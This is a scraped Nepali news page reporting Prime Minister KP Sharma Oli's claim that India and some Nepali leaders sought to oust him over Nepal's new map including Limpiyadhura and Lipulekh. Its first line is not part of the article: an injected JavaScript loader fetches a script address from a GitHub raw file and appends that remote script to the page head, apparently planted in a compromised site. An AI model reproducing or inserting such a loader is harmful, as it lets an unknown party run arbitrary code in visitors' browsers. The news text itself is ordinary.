;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); प्रधानमन्त्रीबाट हटाउन खोजियो – ओली – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • प्रधानमन्त्रीबाट हटाउन खोजियो – ओली
समाचार

प्रधानमन्त्रीबाट हटाउन खोजियो – ओली

१४ असार,

काठमाडौं । प्रधानमन्त्री केपी शर्मा ओलीले लिम्पियाधुरा, महाकाली र लिपुलेकलाई समेटेर नेपालको नयाँ नक्सा जारी गरेकै कारण आफूलाई प्रधानमन्त्री पदबाट हटाउने खोजेको दाबी गरेका छन् । भारतको यो खेलमा नेपालका नेताहरू पनि लागेको उनको आरोप छ ।

मदन भण्डारीको ६९ औं जन्मजयन्तीको अवसरमा मदन भण्डारी फाउण्डेसनले आइतबार बालुवाटार गरेको कार्यक्रममा सत्तारूढ नेपाल कम्युनिस्ट पार्टी (नेकपा)का अध्यक्ष एवं प्रधानमन्त्री ओलीले हप्ता/१५ दिनमा प्रधानमन्त्री परिर्वतन हुन्छ भन्न थालिएको बताए । ‘तपाईंहरूले पनि सुन्नु भएको होला, हप्ता/१५ दिनमा प्रधानमन्त्री परिर्वतन हुँदैछ भनिँदैछ’ उनले भने, ‘भारतका मिडिया सुन्नु भएको होला, भारतका बौद्धिक बहसहरू सुन्नु भएको होला । कसरी भारतको राज्य संयन्त्र सक्रिय छ …।’

अघिल्लो पटक प्रधानमन्त्री भएको बेला पनि चीनसँग व्यापार तथा पारवाहन सन्धि गरेलगतै आफ्नो सरकार ढलेको उनले स्मरण गरे ।

नेपालले १४६ वर्ष उपभोग गरेको तर ५८ वर्षदेखि खोसिएको जमिन फिर्ता ल्याउन खोज्दा फेरि आफूलाई हटाउन खोजिएको उनले बताए ।

फेसबुक प्रतिक्रियाहरु